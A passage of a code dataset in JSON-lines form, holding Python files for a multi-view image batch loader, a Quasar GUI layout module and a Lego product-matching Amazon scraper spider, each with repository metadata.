"line_number": 82, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 86, "usage_type": "call"}, {"api_name": "optimalSampling.FIMEvaluator", "line_number": 89, "usage_type": "call"}, {"api_name": "optimalSampling.CramerRaoBound", "line_number": 89, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.mgrid", "line_number": 95, "usage_type": "attribute"}, {"api_name": "optimalSampling.simulateProcess", "line_number": 96, "usage_type": "call"}]}
+{"seq_id": "34293339240", "text": "import cv2\nimport random\nimport numpy as np\nimport time\n#import Queue\ntry:\n import queue\nexcept ImportError:\n import Queue as queue\nimport threading\nimport globals as g_\nfrom concurrent.futures import ThreadPoolExecutor\n\nimport tensorflow as tf\nimport numpy as np\nimport random\nfrom numpy.random import choice, permutation\nfrom itertools import combinations\n\nW = H = 227\n\nclass Shape:\n def __init__(self, list_file):\n with open(list_file) as f:\n self.label = int(f.readline())\n self.V = int(f.readline())\n view_files = [l.strip() for l in f.readlines()]\n\n self.views = self._load_views(view_files, self.V)\n self.done_mean = False\n\n\n def _load_views(self, view_files, V):\n views = []\n for f in view_files:\n im = cv2.imread(f)\n im = cv2.resize(im, (W, H))\n # im = cv2.cvtColor(im, cv2.COLOR_GRAY2BGR) #BGR!!\n assert im.shape == (W,H,3), 'BGR!'\n im = im.astype('float32')\n views.append(im)\n views = np.asarray(views)\n return views\n\n def subtract_mean(self):\n if not self.done_mean:\n mean_bgr = (104., 116., 122.)\n for i in range(3):\n self.views[:,:,:,i] -= mean_bgr[i]\n\n self.done_mean = True\n\n def crop_center(self, size=(227,227)):\n w, h = self.views.shape[1], self.views.shape[2]\n wn, hn = size\n left = w / 2 - wn / 2\n top = h / 2 - hn / 2\n right = left + wn\n bottom = top + hn\n\n #Added by Hui\n left = int(left)\n top = int(top)\n right = int(right)\n bottom = int(bottom)\n\n self.views = self.views[:, left:right, top:bottom, :]\n\n\nclass Dataset:\n def __init__(self, listfiles, labels, subtract_mean, V):\n self.listfiles = listfiles\n self.labels = labels\n self.shuffled = False\n self.subtract_mean = subtract_mean\n self.V = V\n print('dataset inited')\n print (' total size:', len(listfiles))\n\n def shuffle(self):\n z = list(zip(self.listfiles, self.labels))\n random.shuffle(z)\n self.listfiles, self.labels = [list(l) for l in zip(*z)]\n self.shuffled = True\n\n\n def batches(self, batch_size):\n for x,y in self._batches_fast(self.listfiles, batch_size):\n yield x,y\n\n def sample_batches(self, batch_size, n):\n listfiles = random.sample(self.listfiles, n)\n for x,y in self._batches_fast(listfiles, batch_size):\n yield x,y\n\n def _batches(self, listfiles, batch_size):\n n = len(listfiles)\n for i in xrange(0, n, batch_size):\n starttime = time.time()\n\n lists = listfiles[i : i+batch_size]\n x = np.zeros((batch_size, self.V, 227, 227, 3))\n y = np.zeros(batch_size)\n\n for j,l in enumerate(lists):\n s = Shape(l)\n s.crop_center()\n if self.subtract_mean:\n s.subtract_mean()\n x[j, ...] 
= s.views\n y[j] = s.label\n\n print('load batch time:', time.time()-starttime, 'sec')\n yield x, y\n\n def _load_shape(self, listfile):\n s = Shape(listfile)\n s.crop_center()\n if self.subtract_mean:\n s.subtract_mean()\n return s\n\n def _batches_fast(self, listfiles, batch_size):\n subtract_mean = self.subtract_mean\n n = len(listfiles)\n\n def load(listfiles, q, batch_size):\n n = len(listfiles)\n with ThreadPoolExecutor(max_workers=16) as pool:\n for i in range(0, n, batch_size):\n sub = listfiles[i: i + batch_size] if i < n-1 else [listfiles[-1]]\n shapes = list(pool.map(self._load_shape, sub))\n views = np.array([s.views for s in shapes])\n labels = np.array([s.label for s in shapes])\n q.put((views, labels))\n\n # indicate that I'm done\n q.put(None)\n\n # This must be larger than twice the batch_size\n q = queue.Queue(maxsize=g_.INPUT_QUEUE_SIZE)\n\n # background loading Shapes process\n p = threading.Thread(target=load, args=(listfiles, q, batch_size))\n # daemon child is killed when parent exits\n p.daemon = True\n p.start()\n\n\n x = np.zeros((batch_size, self.V, 227, 227, 3))\n y = np.zeros(batch_size)\n\n for i in range(0, n, batch_size):\n starttime = time.time()\n\n item = q.get()\n if item is None:\n break\n x, y = item\n\n # print 'load batch time:', time.time()-starttime, 'sec'\n yield x, y\n\n def size(self):\n \"\"\" size of listfiles (if splitted, only count 'train', not 'val')\"\"\"\n return len(self.listfiles)\n\n\n\n#Added by Hui Wang for siamese network\nclass BatchGenerator():\n def __init__(self, listfiles, labels, subtract_mean, V):\n self.listfiles = listfiles\n self.labels = labels\n self.subtract_mean = subtract_mean\n self.V = V\n\n classDict = np.unique(np.array(self.labels))\n self.numberOfClass = len(classDict.tolist())\n\n np.random.seed(0)\n random.seed(0)\n self.num_idx = dict()\n for idx, num in enumerate(self.labels):\n if num in self.num_idx:\n self.num_idx[num].append(idx)\n else:\n self.num_idx[num] = [idx]\n\n def get_i_views(self, i):\n view_name = self.listfiles[i]\n view = Shape(view_name)\n view.crop_center()\n if self.subtract_mean:\n view.subtract_mean()\n return view.views\n\n def next_batch(self):\n numOfGenuine = g_.batch_size_genuine\n numOfImposter = g_.batch_size_impostor\n batch_size = numOfGenuine + numOfImposter\n\n left = np.zeros((batch_size, self.V, 227, 227, 3))\n right = np.zeros((batch_size, self.V, 227, 227, 3))\n sim = np.zeros(batch_size)\n\n num = 0\n # genuine\n index_ = 0\n indexes_ = []\n ii_ = []\n jj_ = []\n for i in range(self.numberOfClass):\n l = choice(self.num_idx[i], 2, replace=False).tolist()\n ii_.append(l.pop())\n jj_.append(l.pop())\n indexes_.append(index_)\n index_ = index_ + 1\n\n select_index_ = choice(range(0, index_), numOfGenuine, replace=False).tolist()\n for k in range(0, numOfGenuine):\n kk = select_index_[k]\n le_ = ii_[kk]\n ri_ = jj_[kk]\n left[num, ...] = self.get_i_views(le_)\n right[num, ...] = self.get_i_views(ri_)\n sim[num] = 1\n num = num + 1\n\n # impostor\n index = 0\n indexes = []\n ii = []\n jj = []\n for i, j in combinations(range(self.numberOfClass), 2):\n indexes.append(index)\n ii.append(choice(self.num_idx[i]))\n jj.append(choice(self.num_idx[j]))\n index = index + 1\n\n select_index = choice(range(0, index), numOfImposter, replace=False).tolist()\n for k in range(0, numOfImposter):\n kk = select_index[k]\n le = ii[kk]\n ri = jj[kk]\n left[num, ...] = self.get_i_views(le)\n right[num, ...] 
= self.get_i_views(ri)\n sim[num] = 0\n num = num + 1\n\n return np.array(left), np.array(right), np.array(sim)\n\n def size(self):\n \"\"\" size of train dataset\"\"\"\n return len(self.listfiles)\n\n\n", "repo_name": "alittleTom/OVFF", "sub_path": "retrieval/input.py", "file_name": "input.py", "file_ext": "py", "file_size_in_byte": 7605, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "31", "api": [{"api_name": "cv2.imread", "line_number": 36, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 42, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 82, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 92, "usage_type": "call"}, {"api_name": "time.time", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 103, "usage_type": "call"}, {"api_name": "time.time", "line_number": 113, "usage_type": "call"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 134, "usage_type": "call"}, {"api_name": "Queue.Queue", "line_number": 141, "usage_type": "call"}, {"api_name": "globals.INPUT_QUEUE_SIZE", "line_number": 141, "usage_type": "attribute"}, {"api_name": "threading.Thread", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 151, "usage_type": "call"}, {"api_name": "time.time", "line_number": 154, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 181, "usage_type": "attribute"}, {"api_name": "random.seed", "line_number": 182, "usage_type": "call"}, {"api_name": "globals.batch_size_genuine", "line_number": 199, "usage_type": "attribute"}, {"api_name": "globals.batch_size_impostor", "line_number": 200, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 203, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 214, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 220, "usage_type": "call"}, {"api_name": "itertools.combinations", "line_number": 235, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 237, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 238, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 241, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 251, "usage_type": "call"}]}
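_batches_fast in the record above overlaps disk I/O with consumption: a daemon thread fills a bounded queue while the main thread iterates, and None marks end-of-stream. The skeleton of that pattern, with placeholder batches instead of image tensors:

import queue
import threading

def loader(items, q, batch_size):
    for i in range(0, len(items), batch_size):
        q.put(items[i:i + batch_size])  # blocks while the queue is full
    q.put(None)  # end-of-stream sentinel, as in the record

q = queue.Queue(maxsize=4)  # the bound keeps memory use flat
t = threading.Thread(target=loader, args=(list(range(10)), q, 3), daemon=True)
t.start()

while (batch := q.get()) is not None:
    print(batch)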
+{"seq_id": "45880597652", "text": "\"\"\"\nThis module contains all the Quasar elements that help with the general layout of the page.\n\"\"\"\n\nfrom typing import List, Union\n\nfrom quasargui.base import Component, ComponentWithModel\nfrom quasargui.callbacks import toggle\nfrom quasargui.model import Model, Reactive\nfrom quasargui.quasar_components import QButton\nfrom quasargui.tools import merge_classes, build_props\nfrom quasargui.typing import EventsType, ClassesType, StylesType, PropsType, ChildrenType, PropValueType\n\n\nclass QLayout(Component):\n \"\"\"\n see: https://quasar.dev/layout-builder\n \"\"\"\n component = 'q-layout'\n\n def __init__(self,\n children: List[Union['QHeader', 'QDrawer', 'QPage', 'QFooter']] = None,\n view: str = \"hHh lpR fFf\",\n props: PropsType = None,\n events: EventsType = None\n ):\n \"\"\"\n :param view: see layout-builder, the default value is good for most cases\n :param props:\n \"\"\"\n props = props or {}\n props['view'] = props.get('view', view)\n children = self.build_children(children)\n super().__init__(children=children, props=props, events=events)\n\n @staticmethod\n def build_children(children):\n sandwich_menus = {}\n header = None\n for child in children:\n if isinstance(child, QDrawer):\n if child.menu_in_header:\n sandwich_menus[child.props['side']] = child.model\n if isinstance(child, QHeader):\n header = child\n\n if header is not None and sandwich_menus:\n target = header.children[0] if isinstance(header.children[0], QToolbar) else header\n for side, model in sandwich_menus.items():\n menu_btn = QButton(\n icon='menu',\n classes='float-right' if side == QDrawer.RIGHT else '',\n props={'dense': True},\n events={'click': toggle(model)}\n )\n target.set_children(\n [menu_btn, *target.children] if side == QDrawer.LEFT\n else [*target.children, menu_btn])\n return children\n # TODO: we could have here a set_page() function that corresponds to the route's on a webpage.\n\n\nclass QHeader(ComponentWithModel):\n \"\"\"\n q-header\n Use it within a QLayout.\n ref. https://quasar.dev/layout/header-and-footer#qheader-api\n \"\"\"\n component = 'q-header'\n PRIMARY = 'bg-primary text-white' # convenience constant\n\n defaults = {\n 'props': {\n 'reveal': False, # this is hide_on_scroll\n 'elevated': False,\n 'bordered': False,\n }\n }\n\n def __init__(self,\n children: ChildrenType = None,\n hide_on_scroll: bool = None, # this is the reveal prop\n elevated: bool = None,\n bordered: bool = None,\n show: PropValueType[bool] = True,\n classes: ClassesType = None,\n styles: StylesType = None,\n props: PropsType = None\n ):\n if 1 <= len(children) <= 2 and isinstance(children[-1], str):\n children = [QToolbar([QToolbarTitle(children)])]\n\n props = build_props({}, props, {\n 'reveal': hide_on_scroll,\n 'elevated': elevated,\n 'bordered': bordered,\n })\n model = show if isinstance(show, Reactive) else Model(show)\n super().__init__(model=model, children=children, classes=classes, styles=styles, props=props)\n\n\nclass QDrawer(ComponentWithModel):\n \"\"\"\n q-drawer\n Use it within a QLayout.\n ref. 
https://quasar.dev/layout/drawer#qdrawer-api\n \"\"\"\n component = 'q-drawer'\n # side constants\n LEFT = 'left'\n RIGHT = 'right'\n # behavior constants\n DESKTOP = 'desktop'\n MOBILE = 'mobile'\n RESPONSIVE = 'default'\n\n defaults = {\n 'props': {\n 'behavior': DESKTOP,\n 'overlay': False,\n 'bordered': True,\n 'side': LEFT,\n 'width': 200,\n }\n }\n\n def __init__(self,\n children: ChildrenType = None,\n menu_in_header: bool = True,\n side: str = None,\n show: Union[Model, bool] = True,\n bordered: bool = None,\n classes: ClassesType = None,\n styles: StylesType = None,\n props: PropsType = None,\n events: EventsType = None\n ):\n \"\"\"\n :menu_in_header: if used together with QLayout, it instructs to put a close menu into the header.\n \"\"\"\n self.menu_in_header = menu_in_header\n children = children\n props = build_props({}, props, {\n 'side': side,\n 'bordered': bordered,\n })\n model = show if isinstance(show, Reactive) else Model(show)\n super().__init__(model=model, children=children, classes=classes, styles=styles, props=props, events=events)\n\n\nclass QPage(Component):\n \"\"\"\n q-page wrapped in q-page-container\n Use it within a QLayout.\n every parameter applies to the q-page.\n \"\"\"\n component = 'q-page-container'\n defaults = {\n 'props': {\n 'padding': True,\n }\n }\n\n def __init__(self,\n children: ChildrenType = None,\n padding: PropValueType[bool] = None,\n classes: ClassesType = None,\n styles: StylesType = None,\n props: PropsType = None,\n events: EventsType = None\n ):\n props = build_props({}, props, {'padding': padding})\n self.page = _Page(children=children, classes=classes, styles=styles, props=props, events=events)\n super().__init__(children=[self.page])\n\n\nclass _Page(Component):\n \"\"\"\n Internal component for the QPage,\n since in quasar q-page is always wrapped into q-page-container.\n \"\"\"\n component = 'q-page'\n\n def __init__(self,\n children: ChildrenType = None,\n classes: ClassesType = None,\n styles: StylesType = None,\n props: PropsType = None,\n events: EventsType = None\n ):\n super().__init__(children=children, classes=classes, styles=styles, props=props, events=events)\n\n\nclass QFooter(ComponentWithModel):\n \"\"\"\n q-footer\n ref. https://quasar.dev/layout/header-and-footer#qfooter-api\n \"\"\"\n component = 'q-footer'\n defaults = {\n 'props': {\n 'reveal': False,\n 'elevated': False,\n 'bordered': True,\n 'show': True,\n },\n 'classes': 'bg-white text-black q-px-sm'\n }\n\n def __init__(self,\n children: ChildrenType = None,\n show: PropValueType[bool] = None,\n hide_on_scroll: bool = None, # this is the reveal prop\n elevated: bool = None,\n bordered: bool = None,\n classes: ClassesType = None,\n styles: StylesType = None,\n props: PropsType = None,\n events: EventsType = None\n ):\n props = build_props(self.defaults['props'], props, {\n 'reveal': hide_on_scroll,\n 'elevated': elevated,\n 'bordered': bordered,\n 'show': show,\n })\n show = props['show']\n model = show if isinstance(show, Reactive) else Model(show)\n super().__init__(model=model, children=children, classes=classes, styles=styles, props=props, events=events)\n\n\nclass QToolbar(Component):\n component = 'q-toolbar'\n\n\nclass QToolbarTitle(Component):\n component = 'q-toolbar-title'\n\n\nclass QSpace(Component):\n component = 'q-space'\n\n\nclass QBreadcrumbsElement(Component):\n \"\"\"\n ref. https://quasar.dev/vue-components/breadcrumbs#qbreadcrumbsel-api\n \"\"\"\n component = 'q-breadcrumbs-el'\n\n\nclass QBreadcrumbs(Component):\n \"\"\"\n ref. 
https://quasar.dev/vue-components/breadcrumbs#qbreadcrumbs-api\n \"\"\"\n component = 'q-breadcrumbs'\n\n def __init__(self,\n children: List[QBreadcrumbsElement] = None,\n classes: ClassesType = None,\n styles: StylesType = None,\n props: PropsType = None,\n events: EventsType = None):\n super().__init__(\n children=children,\n classes=classes,\n styles=styles,\n props=props,\n events=events)\n\n\nclass QBar(Component):\n \"\"\"\n ref. https://quasar.dev/vue-components/bar#qbar-api\n \"\"\"\n component = 'q-bar'\n", "repo_name": "BarnabasSzabolcs/pyquasargui", "sub_path": "quasargui/layout.py", "file_name": "layout.py", "file_ext": "py", "file_size_in_byte": 8723, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "32", "api": [{"api_name": "quasargui.base.Component", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 22, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 22, "usage_type": "name"}, {"api_name": "quasargui.typing.PropsType", "line_number": 24, "usage_type": "name"}, {"api_name": "quasargui.typing.EventsType", "line_number": 25, "usage_type": "name"}, {"api_name": "quasargui.quasar_components.QButton", "line_number": 50, "usage_type": "call"}, {"api_name": "quasargui.callbacks.toggle", "line_number": 54, "usage_type": "call"}, {"api_name": "quasargui.base.ComponentWithModel", "line_number": 63, "usage_type": "name"}, {"api_name": "quasargui.typing.ChildrenType", "line_number": 81, "usage_type": "name"}, {"api_name": "quasargui.typing.PropValueType", "line_number": 85, "usage_type": "name"}, {"api_name": "quasargui.typing.ClassesType", "line_number": 86, "usage_type": "name"}, {"api_name": "quasargui.typing.StylesType", "line_number": 87, "usage_type": "name"}, {"api_name": "quasargui.typing.PropsType", "line_number": 88, "usage_type": "name"}, {"api_name": "quasargui.tools.build_props", "line_number": 93, "usage_type": "call"}, {"api_name": "quasargui.model.Reactive", "line_number": 98, "usage_type": "argument"}, {"api_name": "quasargui.model.Model", "line_number": 98, "usage_type": "call"}, {"api_name": "quasargui.base.ComponentWithModel", "line_number": 102, "usage_type": "name"}, {"api_name": "quasargui.typing.ChildrenType", "line_number": 128, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 131, "usage_type": "name"}, {"api_name": "quasargui.model.Model", "line_number": 131, "usage_type": "name"}, {"api_name": "quasargui.typing.ClassesType", "line_number": 133, "usage_type": "name"}, {"api_name": "quasargui.typing.StylesType", "line_number": 134, "usage_type": "name"}, {"api_name": "quasargui.typing.PropsType", "line_number": 135, "usage_type": "name"}, {"api_name": "quasargui.typing.EventsType", "line_number": 136, "usage_type": "name"}, {"api_name": "quasargui.tools.build_props", "line_number": 143, "usage_type": "call"}, {"api_name": "quasargui.model.Reactive", "line_number": 147, "usage_type": "argument"}, {"api_name": "quasargui.model.Model", "line_number": 147, "usage_type": "call"}, {"api_name": "quasargui.base.Component", "line_number": 151, "usage_type": "name"}, {"api_name": "quasargui.typing.ChildrenType", "line_number": 165, "usage_type": "name"}, {"api_name": "quasargui.typing.PropValueType", "line_number": 166, "usage_type": "name"}, {"api_name": "quasargui.typing.ClassesType", "line_number": 167, "usage_type": "name"}, {"api_name": "quasargui.typing.StylesType", "line_number": 168, "usage_type": "name"}, {"api_name": 
"quasargui.typing.PropsType", "line_number": 169, "usage_type": "name"}, {"api_name": "quasargui.typing.EventsType", "line_number": 170, "usage_type": "name"}, {"api_name": "quasargui.tools.build_props", "line_number": 172, "usage_type": "call"}, {"api_name": "quasargui.base.Component", "line_number": 177, "usage_type": "name"}, {"api_name": "quasargui.typing.ChildrenType", "line_number": 185, "usage_type": "name"}, {"api_name": "quasargui.typing.ClassesType", "line_number": 186, "usage_type": "name"}, {"api_name": "quasargui.typing.StylesType", "line_number": 187, "usage_type": "name"}, {"api_name": "quasargui.typing.PropsType", "line_number": 188, "usage_type": "name"}, {"api_name": "quasargui.typing.EventsType", "line_number": 189, "usage_type": "name"}, {"api_name": "quasargui.base.ComponentWithModel", "line_number": 194, "usage_type": "name"}, {"api_name": "quasargui.typing.ChildrenType", "line_number": 211, "usage_type": "name"}, {"api_name": "quasargui.typing.PropValueType", "line_number": 212, "usage_type": "name"}, {"api_name": "quasargui.typing.ClassesType", "line_number": 216, "usage_type": "name"}, {"api_name": "quasargui.typing.StylesType", "line_number": 217, "usage_type": "name"}, {"api_name": "quasargui.typing.PropsType", "line_number": 218, "usage_type": "name"}, {"api_name": "quasargui.typing.EventsType", "line_number": 219, "usage_type": "name"}, {"api_name": "quasargui.tools.build_props", "line_number": 221, "usage_type": "call"}, {"api_name": "quasargui.model.Reactive", "line_number": 228, "usage_type": "argument"}, {"api_name": "quasargui.model.Model", "line_number": 228, "usage_type": "call"}, {"api_name": "quasargui.base.Component", "line_number": 232, "usage_type": "name"}, {"api_name": "quasargui.base.Component", "line_number": 236, "usage_type": "name"}, {"api_name": "quasargui.base.Component", "line_number": 240, "usage_type": "name"}, {"api_name": "quasargui.base.Component", "line_number": 244, "usage_type": "name"}, {"api_name": "quasargui.base.Component", "line_number": 251, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 258, "usage_type": "name"}, {"api_name": "quasargui.typing.ClassesType", "line_number": 259, "usage_type": "name"}, {"api_name": "quasargui.typing.StylesType", "line_number": 260, "usage_type": "name"}, {"api_name": "quasargui.typing.PropsType", "line_number": 261, "usage_type": "name"}, {"api_name": "quasargui.typing.EventsType", "line_number": 262, "usage_type": "name"}, {"api_name": "quasargui.base.Component", "line_number": 271, "usage_type": "name"}]}
+{"seq_id": "20532988667", "text": "import re\nimport os\nimport shutil\n\nfrom decimal import Decimal\n\nfrom scrapy.selector import HtmlXPathSelector\n\nHERE = os.path.abspath(os.path.dirname(__file__))\n\nfrom product_spiders.base_spiders import BaseAmazonSpider\n\nfrom scrapy import signals\nfrom scrapy.xlib.pydispatch import dispatcher\n\nfrom product_spiders.fuzzywuzzy.fuzz import ratio, partial_ratio\nfrom product_spiders.fuzzywuzzy import utils\n\nminifigures_words = [\n 'mini figures',\n 'mini figure',\n 'minifigures',\n 'minifigure',\n 'from set',\n 'from sets',\n 'minifig',\n 'loose',\n 'nobox',\n 'from set',\n 'from sets'\n]\n\ndef _filter_name(name):\n \"\"\"\n Filter auxiliary words from product name, like 'new offers for...'\n :param name: product name\n :type name: str\n :return: filtered name\n :rtype: str\n\n >>> _filter_name('New Offers for Lego Ninjago')\n 'Lego Ninjago'\n >>> _filter_name('Lego Ninjago Jouet de Premier')\n 'Lego Ninjago'\n \"\"\"\n words_to_filter_out = ['new offers for']\n\n res = name[:]\n for word in words_to_filter_out:\n m = re.search(word, name, re.I)\n if m:\n res = res.replace(m.group(0), '')\n res = res.strip()\n return res\n\ndef filter_category(name, category):\n category = category.lower()\n m = re.search(category, name, re.I)\n res = name[:]\n if m:\n res = name.replace(m.group(0), '')\n res = res.strip()\n return res\n\ndef name_fuzzy_score(product1, product2):\n product1 = _filter_name(product1)\n product2 = _filter_name(product2)\n\n s1 = utils.full_process(product1)\n s2 = utils.full_process(product2)\n return ratio(s1, s2)\n\ndef name_fuzzy_partial_score(product1, product2):\n product1 = _filter_name(product1)\n product2 = _filter_name(product2)\n\n s1 = utils.full_process(product1)\n s2 = utils.full_process(product2)\n return partial_ratio(s1, s2)\n\ndef name_fuzzy_match(product1, product2):\n product1 = _filter_name(product1)\n product2 = _filter_name(product2)\n\n if name_fuzzy_score(product1, product2) > 50:\n return True\n return False\n\ndef check_max_price(search_price, price, price_diff=0.5):\n \"\"\"\n Checks price variation\n\n >>> check_max_price(12, 60)\n False\n >>> check_max_price(60, 12)\n False\n >>> check_max_price(30, 60)\n True\n >>> check_max_price(60, 30)\n False\n >>> check_max_price(12, 60, 0.8)\n True\n >>> check_max_price(60, 12, 0.8)\n False\n >>> check_max_price(99, 186, 0.6)\n True\n >>> check_max_price(99, 186, 0.5)\n True\n >>> check_max_price(12, 60, 0.7)\n False\n >>> check_max_price(149.99, 499, 1)\n True\n \"\"\"\n search_price = Decimal(search_price)\n price = Decimal(price)\n diff = abs(price - search_price)\n matches = diff / price <= price_diff\n return matches\n\ndef check_price_valid(search_price, price, min_ratio=0.5, max_ratio=3):\n \"\"\"\n Checks price variation for lego.\n Ensures that price is between min_ratio * search_price and max_ratio * search_price\n\n >>> check_price_valid(12, 60)\n False\n >>> check_price_valid(60, 12)\n False\n >>> check_price_valid(30, 60)\n True\n >>> check_price_valid(60, 30)\n True\n >>> check_price_valid(99, 186)\n True\n >>> check_price_valid(99, 186)\n True\n >>> check_price_valid(12, 60)\n False\n >>> check_price_valid(149.99, 499, max_ratio=5)\n True\n >>> check_price_valid(319.99, 39.95)\n False\n >>> check_price_valid(Decimal('319.99'), Decimal('39.95'))\n False\n \"\"\"\n if isinstance(search_price, float):\n search_price = Decimal(str(search_price))\n else:\n search_price = Decimal(search_price)\n\n if isinstance(price, float):\n price = 
Decimal(str(price))\n else:\n price = Decimal(price)\n\n if isinstance(min_ratio, float):\n min_ratio = Decimal(str(min_ratio))\n else:\n min_ratio = Decimal(min_ratio)\n\n if isinstance(max_ratio, float):\n max_ratio = Decimal(str(max_ratio))\n else:\n max_ratio = Decimal(max_ratio)\n\n if min_ratio * search_price <= price <= max_ratio * search_price:\n return True\n return False\n\ndef sku_match(search_item, new_item):\n _re_sku = re.compile(r'(\\d{3,})')\n sku = _re_sku.findall(new_item['name'].replace(' ', ''))\n sku.extend(_re_sku.findall(new_item['name']))\n sku = set(sku)\n\n search_price = search_item.get('price')\n\n if sku:\n if len(sku) <= 1:\n match_sku = search_item['sku'] in sku\n return match_sku\n elif search_price:\n match_sku = search_item['sku'] in sku\n valid_price = check_price_valid(search_price, new_item['price'])\n if not valid_price:\n return False\n return match_sku\n else:\n return False\n else:\n return False\n\ndef brand_match(new_item):\n brand = new_item.get('brand', '').upper()\n brand_matches = brand == 'LEGO' or brand.startswith('LEGO ') \\\n or 'LEGO' in new_item['name'].upper()\n return brand_matches\n\nclass BaseLegoAmazonSpider(BaseAmazonSpider):\n all_sellers = True\n\n download_delay = 1.0\n randomize_download_delay = True\n\n skus_found = []\n errors = []\n exclude_products = []\n\n lego_amazon_domain = 'www.amazon.com'\n\n def __init__(self, *args, **kwargs):\n super(BaseLegoAmazonSpider, self).__init__(self.lego_amazon_domain, *args, **kwargs)\n self._re_sku = re.compile(r'(\\d{3,})')\n self.try_suggested = False\n self.do_retry = True\n\n dispatcher.connect(self.spider_closed, signals.spider_closed)\n\n self.old_skus = []\n if os.path.exists(self.f_skus_found):\n shutil.copy(os.path.join(HERE, self.f_skus_found),\n os.path.join(HERE, '%s.bak' % self.f_skus_found))\n with open(self.f_skus_found) as f:\n for sku in f:\n self.old_skus.append(sku.strip())\n\n def spider_closed(self, spider):\n missing_skus = set(self.old_skus) - set(self.skus_found)\n for sku in missing_skus:\n self.errors.append('WARNING: sku %s not found' % sku)\n with open(self.f_skus_found, 'w') as f:\n for sku in self.skus_found:\n f.write('%s\\n' % sku)\n\n def match_min_price(self, search_item, new_item, price_diff=0.5):\n ''' Checks price variation '''\n search_price = search_item.get('price', None)\n if not search_price:\n return True\n search_price = Decimal(search_price)\n diff = Decimal(search_price) * Decimal(price_diff)\n matches = search_price - diff <= Decimal(new_item['price'])\n if not matches:\n self.log('Item price is too different from %s, reject %s' % (search_price, new_item))\n return matches\n\n def match_lego_name(self, search_item, new_item):\n sku = self._re_sku.findall(new_item['name'].replace(' ', ''))\n sku.extend(self._re_sku.findall(new_item['name']))\n sku = set(sku)\n\n search_price = search_item.get('price')\n\n if sku:\n if not len(sku) > 1:\n match_sku = search_item['sku'] in sku\n self.log('SKU %s in %s ? %s' % (search_item['sku'], sku, match_sku))\n return match_sku\n elif search_price:\n match_sku = search_item['sku'] in sku\n self.log('SKU %s in %s ? 
%s' % (search_item['sku'], sku, match_sku))\n valid_price = self._check_max_price(search_price, new_item['price'])\n if not valid_price:\n self.log('Reject lot of products => %s' % new_item['url'])\n return False\n return match_sku\n else:\n self.log('Reject lot of products => %s' % new_item['url'])\n return False\n\n return self.match_name(search_item, new_item, match_threshold=70)\n\n def match(self, search_item, new_item):\n return (self.match_min_price(search_item, new_item)\n and self.match_lego_name(search_item, new_item)\n and not self._excluded_product(new_item['name'])\n and self._valid_terms(new_item['name']))\n\n def basic_match(self, search_item, new_item):\n return self.match_lego_name(search_item, new_item)\n\n def _excluded_product(self, product_name):\n for product in self.exclude_products:\n if product.upper() in product_name.upper():\n return True\n return False\n\n def parse_mbc_list(self, response):\n hxs = HtmlXPathSelector(response)\n\n try:\n hxs.select('//a[@id=\"olpDetailPageLink\"]/@href').extract()[0]\n except:\n yield self.retry_download(failure=None,\n url=response.url,\n metadata=response.meta,\n callback=self.parse_mbc_list)\n else:\n for r in super(BaseLegoAmazonSpider, self).parse_mbc_list(response):\n yield r\n\n def _collect_all(self, collected_items, new_item):\n if new_item['sku'] not in self.skus_found:\n self.skus_found.append(new_item['sku'])\n super(BaseLegoAmazonSpider, self)._collect_all(collected_items, new_item)\n\n def _collect_lowest_price(self, collected_items, new_item):\n if new_item['sku'] not in self.skus_found:\n self.skus_found.append(new_item['sku'])\n super(BaseLegoAmazonSpider, self)._collect_lowest_price(collected_items, new_item)\n\n def _collect_best_match(self, collected_items, new_item, search):\n if new_item['sku'] not in self.skus_found:\n self.skus_found.append(new_item['sku'])\n super(BaseLegoAmazonSpider, self)._collect_best_match(collected_items, new_item, search)\n\n def _check_max_price(self, search_price, price):\n ''' Checks price variation '''\n price_diff = 0.5\n search_price = Decimal(search_price)\n diff = Decimal(search_price) * Decimal(price_diff)\n return Decimal(price) <= search_price + diff\n\n def _valid_terms(self, item_name):\n '''\n [([], []),\n ([...], [...]),\n ([...], [...])]\n '''\n item_name = item_name.lower()\n exclude_ = [(['NO MINIFIG'], []),\n (['FROM SET'], []),\n (['MINIFIG', 'MINIFG'], ['MINIFIGURES', 'INCLUDE'])]\n for values, exceptions in exclude_:\n for w in values:\n if w.lower() in item_name:\n itsvalid = False\n for e in exceptions:\n if e.lower() in item_name:\n itsvalid = True\n break\n if not itsvalid:\n return False\n return True\n\n", "repo_name": "Godsoo/scraping", "sub_path": 